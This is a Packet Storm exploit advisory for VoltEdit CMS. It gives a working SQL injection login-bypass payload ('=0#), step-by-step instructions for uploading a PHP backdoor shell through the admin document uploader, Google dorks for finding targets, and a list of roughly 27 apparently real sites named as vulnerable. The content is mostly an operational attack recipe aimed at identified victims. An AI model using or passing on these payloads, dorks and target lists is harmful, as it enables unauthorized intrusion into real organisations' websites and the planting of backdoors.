what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

VoltEdit CMS SQL Injection / Shell Upload

VoltEdit CMS SQL Injection / Shell Upload
Posted Aug 18, 2013
Authored by X-Cisadane

VoltEdit CMS suffers from administrative login bypass due to remote SQL injection and allows for PHP shells to be uploaded. Note that this finding houses site-specific data.

tags | exploit, remote, shell, php, sql injection
SHA-256 | e7647ac0f638ac3badc02964265910c1dd8524abebceee54710f8a72dc9f1926

VoltEdit CMS SQL Injection / Shell Upload

Change Mirror Download
========================================================================================== 
VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Date : 18 August 2013
: # Author : X-Cisadane
: # CMS Developer : http://www.ady-voltedge.com/website_development.php
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection Admin Login Bypass & Shell Upload Vulnerability
: # Tested On : Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:

A multiple vulnerabilities has been identified in "VoltEdit CMS", which could be exploited by attackers to bypass security restrictions into
admin panel. Login input is not well sanitized in admin.php which can lead to to include some specials chars used to change SQL syntax so we
can gain admin access. Successful exploitations allows attacker to access into administrative functions without requiring knowledge of the
password. An attackers while login as admin, may upload PHP Shell (Backdoor) use the document uploader feature.

DORKS (How to find the target) :
================================
intext:VoltEdit cms
inurl:/doing_business_here.php
inurl:/map_room.php
inurl:/colleges_universities.php
Or use your own Google Dorks :)

Proof of Concept
================

[ 1 ] SQL Injection Admin Login Bypass
Find the target use the dorks above, for example I'm use this dork inurl:/doing_business_here.php
and got the target www.russellville.org/doing_business_here.php
Change the target URL to /admin.php, for example www.russellville.org/admin.php
After login form appeared, fill the Login ID and Password with '=0#
Gotcha! Pic : http://i43.tinypic.com/fmtesh.png

[ 2 ] Uploading Shell / PHP Backdoor
After login with Administrator Previllege, you can upload PHP Shell
Click Documents menu & Click Choose File
Upload your PHP Shell
Go to http://TARGET/documents/Your Shell.php
Example : http://www.russellville.org/documents/botak.php3

Example of the Vulnerable Sites :
http://www.businessreadywi.com/admin.php
http://www.adyvoltedge.com/index.php
http://www.jcjdc.net/admin.php
http://www.cortlandbusiness.com/admin.php
http://www.morgancoed.com/admin.php
http://www.russellville.org/admin.php
http://drumcountrybusiness.com/admin.php
http://madisoncountyida.com/admin.php
http://chooseeasterniowa.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://www.foxcitiesregionalpartnership.com/admin.php
http://www.wedobusinesswi.com/admin.php
http://cayuga.adyvoltedge.com/admin.php
http://edwc.org/admin.php
http://www.russellville.org/admin.php
http://www.hancockedc.com/admin.php
http://www.purelansing.com/admin.php
http://www.mcedinc.com/admin.php
http://www.ocedp.com/admin.php
http://scottcountyin.com/admin.php
http://www.putnamcountyindianaeconomicdevelopment.com/admin.php
http://nchcedc.org/admin.php
http://www.jaspercountyin.com/admin.php
http://michiana.adyvoltedge.com/admin.php
http://www.thevalleypartnership.com/admin.php
http://scott.ady-voltedge.com/admin.php
http://highland.ady-voltedge.com/admin.php
etc ...
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close